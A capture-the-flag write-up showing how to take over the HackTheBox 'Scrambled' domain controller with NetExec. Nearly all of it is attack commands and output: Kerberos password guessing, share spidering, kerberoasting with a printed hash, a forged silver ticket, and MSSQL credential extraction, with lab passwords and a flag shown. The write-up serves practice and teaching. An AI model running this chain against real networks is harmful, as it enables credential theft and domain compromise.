Let pwn the box Scrambled from HackTheBox using only NetExec ! For context, I was reading Scrambled writeup from 0xdf_ when I read this:
smbclient won’t work, and I wasn’t able to get crackmapexec to work either.
To be fair, at the time of his writeup it was true, but not anymore and it's pretty simple with NXC, 5 minutes and you get root :)
Note: I will pass the web part where we get one username : ksimpson
netexec ldap 10.10.11.168
LDAP 10.10.11.168 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
- Target: DC1.scrm.local
- Domain: scrm.local
We can update our /etc/hosts file
netexec ldap DC1.scrm.local -u ksimpson -p blabla
LDAP dc1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAP dc1.scrm.local 389 DC1.scrm.local [-] scrm.local\ksimpson:blabla STATUS_NOT_SUPPORTED
# with kerberos
netexec ldap DC1.scrm.local -u ksimpson -p blabla -k
LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAP DC1.scrm.local 389 DC1.scrm.local [-] scrm.local\ksimpson:blabla KDC_ERR_PREAUTH_FAILED
KDC_ERR_PREAUTH_FAILED => mean we have a valid username but bad password ! Let's try login = password ;) Also, you may have noticed the STATUS_NOT_SUPPORTED without kerberos option, it means NTLM is disabled on the domain, no big deal for NXC ;)
netexec ldap DC1.scrm.local -u ksimpson -p ksimpson -k
LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\ksimpson
netexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k --shares
SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\ksimpson:ksimpson
SMB DC1.scrm.local 445 DC1.scrm.local [+] Enumerated shares
SMB DC1.scrm.local 445 DC1.scrm.local Share Permissions Remark
SMB DC1.scrm.local 445 DC1.scrm.local ----- ----------- ------
SMB DC1.scrm.local 445 DC1.scrm.local ADMIN$ Remote Admin
SMB DC1.scrm.local 445 DC1.scrm.local C$ Default share
SMB DC1.scrm.local 445 DC1.scrm.local HR
SMB DC1.scrm.local 445 DC1.scrm.local IPC$ READ Remote IPC
SMB DC1.scrm.local 445 DC1.scrm.local IT
SMB DC1.scrm.local 445 DC1.scrm.local NETLOGON READ Logon server share
SMB DC1.scrm.local 445 DC1.scrm.local Public READ
SMB DC1.scrm.local 445 DC1.scrm.local Sales
SMB DC1.scrm.local 445 DC1.scrm.local SYSVOL READ Logon server share
User can read "Public" share
netexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k -M spider_plus
SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\ksimpson:ksimpson
SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] Started spidering plus with option:
SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] DIR: ['print$']
SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] EXT: ['ico', 'lnk']
SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] SIZE: 51200
SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] OUTPUT: /tmp/nxc_spider_plus
cat /tmp/nxc_spider_plus/DC1.scrm.local.json | grep 'Public' -A 6
"Public": {
"Network Security Changes.pdf": {
"atime_epoch": "2021-11-04 18:23:11",
"ctime_epoch": "2021-11-04 18:20:49",
"mtime_epoch": "2021-11-05 13:45:07",
"size": "615.34 KB"
}
There is one file: "Network Security Changes.pdf", let's get the file :)
netexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k --get-file 'Network Security Changes.pdf' /tmp/Network_Security_Changes.pdf --share "Public"
SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\ksimpson:ksimpson
SMB DC1.scrm.local 445 DC1.scrm.local [*] Copy Network Security Changes.pdf to /tmp/Network_Security_Changes.pdf
SMB DC1.scrm.local 445 DC1.scrm.local [+] File Network Security Changes.pdf was transferred to /tmp/Network_Security_Changes.pdf
netexec ldap DC1.scrm.local -u ksimpson -p ksimpson -k --kerberoasting /tmp/hash
LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\ksimpson
LDAPS DC1.scrm.local 636 DC1.scrm.local [*] Total of records returned 2
LDAPS DC1.scrm.local 636 DC1.scrm.local sAMAccountName: sqlsvc memberOf: pwdLastSet: 2021-11-03 12:32:02.351452 lastLogon:2022-11-01 15:06:06.512547
LDAPS DC1.scrm.local 636 DC1.scrm.local $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$3b7c5f0a4c366bceb1bb3f7747a898b8$d7519a37a494d59bb728c38677203f9a765440ccc6ab7105f5431c12dc17574fa164bbba88922216d9f2d2b717b7761b7ec449ddcf55b1578807e7d34b97fc1094b68db8ccd8356aa605d6d416cafa0fed51824009008034920a1251bd7f2e1405627f95ebffbbd7863cb7251f581bfdd7128854e6443e1d320af65d263cd6eec7d451b87e80ff611b07cc6fed0fc21b31c6f06a28ac78053c8ad023b4e45c01b8ba196eea2ae4d2e32a575cca0c0b2e25164f4e5b4457c4f630ef4c9d33d1b733dfe32e23548b14afe7748c96011eba7bf3a8bbaf2db500a1e8ffbd4927561969183b3b37ec99400c9e856852b6a62e3580b6129789c96ea8f5df0bb11fc10fd4de7ae0993ec17dd8c967b9cc130fe4aedb33df2a7b6e67816854bda58a3ea4e360ffd0499d54a984a6130dffea7241d8ced5e345ad0e8968b4ff1725825572c5a489ff77d912ed6a9f5dd4bff35e0299cb3b9ad665227d0f104de22bd395a2995c0692286d394e49e6eec1e4db89956c6049b60f697bdbab91eb1b232f047939744bd6b595d396d9a44af7b6dde719a0a1634463217e87137cb90b2cfd0b573406ea25b7c0bddc18a00981e0c84093f29da9f55573e480e7247de386c478345555911362c9de7a2460b0a593f178e125b3c50d376d3f6caadcf78a3493c100f007013923b8d6a13b04b5c44016c4ab36de56030a615d15d22c54b30f4952c5ddcf7b44b792033a3c1dfab7c1d2b5844af0f7e72449fc4cb1fe32a00fc61e77be03cd5dfbcb54e96d7f8cef7826a1ec1f533aef967796e57593cf762b819065b31a99c863f2c36076d62dc0eb6051261ecd5a940ab888ae8fc95dc09c4c3ca0173b414e338699749c7918a89928af702b9ed3a74721adb34c32a3f75a60660ddc0056734da74b824375f3c7cc743332f355955bee4f7dde448d2517ab68dcb8a4a34db2f802cfd98e3eee29bafc8937b99ee0da35c96be4ae77b03bc68b38b6f3b0f010dcaa8a9820ecdc9d86b2e7c111bcfbe9c9df93e0b21283d8b0630dee59dfbb9cfdbf464c18253081aa8832d79756d7bce6a7a0c597cba7b434a078edf70b8c6d774dc3a48761ecad0d391d787360ca33537b8ae3f4d763996f7edb7249d52ccd5fb9d465b7e088c1db7383ba963013c00bfa5c912b8a9d2b432613e68e7b331d1334494dfe57356203e1a3b7b1af1e84fcf56196e48dfd651ae6cb4932d4e057ad288dbf64cbf63490cad7cf427f3ba69066c1f9d597e61cbd9025833c91884a5d6b449ca54a9a75f43f0ebc1bcc0748c70d62e390083f022241cde53a3b056bfc78f245ef08674862d97ca2f7d9ca7b43f4554defceb80f1fe6dbd33ce27da7231ca8376bc5372f2a9e9be07001763850569a0aba4f82d663e1677ec20aec8bda13bda2b8994a7b24d369092e594fbfd23857f7405f08
# checking creds after cracking with Hashcat
netexec ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k
LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\sqlsvc
netexec mssql DC1.scrm.local -u sqlsvc -p Pegasus60 -d scrm.local -k
MSSQL DC1.scrm.local 1433 None [*] None (name:DC1.scrm.local) (domain:scrm.local)
MSSQL DC1.scrm.local 1433 None [-] ERROR(DC1): Line 1: Login failed for user 'SCRM\sqlsvc'
User cannot connect to the MSSQL (very strange but i guess it on purpose to exploit a Kerberos Silver Tickets which is very cool !
netexec ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sid
LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\sqlsvc
LDAPS DC1.scrm.local 636 DC1.scrm.local Domain SID S-1-5-21-2743207045-1827831105-2542523200
Notice the automatic switch between LDAP and LDAPS ! :D
impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -dc-ip dc1.scrm.local -spn MSSQLSvc/dc1.scrm.local:1433 administrator
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in administrator.ccache
export KRB5CCNAME=administrator.ccache
netexec mssql DC1.scrm.local --use-kcache
MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:)
MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!)
netexec mssql DC1.scrm.local --use-kcache --query "SELECT LdapUser,LdapPwd from ScrambleHR.dbo.UserImport;"
MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:)
MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!)
MSSQL dc1.scrm.local 1433 NONE LdapUser
MSSQL dc1.scrm.local 1433 NONE LdapPwd
MSSQL dc1.scrm.local 1433 NONE --------------------------------------------------
MSSQL dc1.scrm.local 1433 NONE --------------------------------------------------
MSSQL dc1.scrm.local 1433 NONE MiscSvc
MSSQL dc1.scrm.local 1433 NONE ScrambledEggs9900
# checking new creds
netexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k
SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900
We got a new user:
- User: MiscSvc
- Password: ScrambledEggs9900
netexec mssql DC1.scrm.local --use-kcache --get-file 'c:\\users\\miscsvc\\desktop\\user.txt' /tmp/user.txt
MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:)
MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!)
MSSQL dc1.scrm.local 1433 NONE [*] Copy c:\\users\\miscsvc\\desktop\\user.txt to /tmp/user.txt
MSSQL dc1.scrm.local 1433 NONE [+] File c:\\users\\miscsvc\\desktop\\user.txt was transferred to /tmp/user.txt
netexec mssql DC1.scrm.local --use-kcache --get-file 'c:\\users\\administrator\\desktop\\root.txt' /tmp/root.txt
MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:)
MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!)
MSSQL dc1.scrm.local 1433 NONE [*] Copy c:\\users\\administrator\\desktop\\root.txt to /tmp/root.txt
MSSQL dc1.scrm.local 1433 NONE [+] File c:\\users\\administrator\\desktop\\root.txt was transferred to /tmp/root.txt
cat /tmp/root.txt
936c171e740f3009a405919f03a05644
We have the root flag but it seems it is not the end so let's go for the fun :)
netexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k --shares
SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900
SMB DC1.scrm.local 445 DC1.scrm.local [+] Enumerated shares
SMB DC1.scrm.local 445 DC1.scrm.local Share Permissions Remark
SMB DC1.scrm.local 445 DC1.scrm.local ----- ----------- ------
SMB DC1.scrm.local 445 DC1.scrm.local ADMIN$ Remote Admin
SMB DC1.scrm.local 445 DC1.scrm.local C$ Default share
SMB DC1.scrm.local 445 DC1.scrm.local HR
SMB DC1.scrm.local 445 DC1.scrm.local IPC$ READ Remote IPC
SMB DC1.scrm.local 445 DC1.scrm.local IT READ
SMB DC1.scrm.local 445 DC1.scrm.local NETLOGON READ Logon server share
SMB DC1.scrm.local 445 DC1.scrm.local Public READ
SMB DC1.scrm.local 445 DC1.scrm.local Sales
SMB DC1.scrm.local 445 DC1.scrm.local SYSVOL READ Logon server share
SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900
SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] Started spidering plus with option:
SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] DIR: ['netlogon', 'public', 'sysvol', 'ipc$']
SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] EXT: ['ico', 'lnk']
SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] SIZE: 51200
SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] OUTPUT: /tmp/nxc_spider_plus
┌──(kali㉿kali)-[~/netexec]
└─$ cat /tmp/nxc_spider_plus/DC1.scrm.local.json
{
"IT": {
"Apps/Sales Order Client/ScrambleClient.exe": {
"atime_epoch": "2021-11-05 16:57:06",
"ctime_epoch": "2021-11-05 16:47:10",
"mtime_epoch": "2021-11-05 16:57:08",
"size": "84.5 KB"
},
"Apps/Sales Order Client/ScrambleLib.dll": {
"atime_epoch": "2021-11-05 16:57:06",
"ctime_epoch": "2021-11-05 16:47:10",
"mtime_epoch": "2021-11-05 16:57:08",
"size": "19 KB"
}
}
}
crackmapexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k --get-file 'Apps/Sales Order Client/ScrambleClient.exe' /tmp/file.exe --share "IT"
SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900
SMB DC1.scrm.local 445 DC1.scrm.local [*] Copy Apps/Sales Order Client/ScrambleClient.exe to /tmp/file.exe
SMB DC1.scrm.local 445 DC1.scrm.local [+] File Apps/Sales Order Client/ScrambleClient.exe was transferred to /tmp/file.exe
netexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k --get-file 'Apps/Sales Order Client/ScrambleLib.dll' /tmp/file.dll --share "IT"
SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900
SMB DC1.scrm.local 445 DC1.scrm.local [*] Copy Apps/Sales Order Client/ScrambleLib.dll to /tmp/file.dll
SMB DC1.scrm.local 445 DC1.scrm.local [+] File Apps/Sales Order Client/ScrambleLib.dll was transferred to /tmp/file.dll
For the rest, follow https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html => part ScrambleClient Reverse !
That's all for me, I hope you learn a bit more about NetExec, for latest news follow me on twitter => @mpgn_x64 and follow @0xdf_ for the HTB writeup :)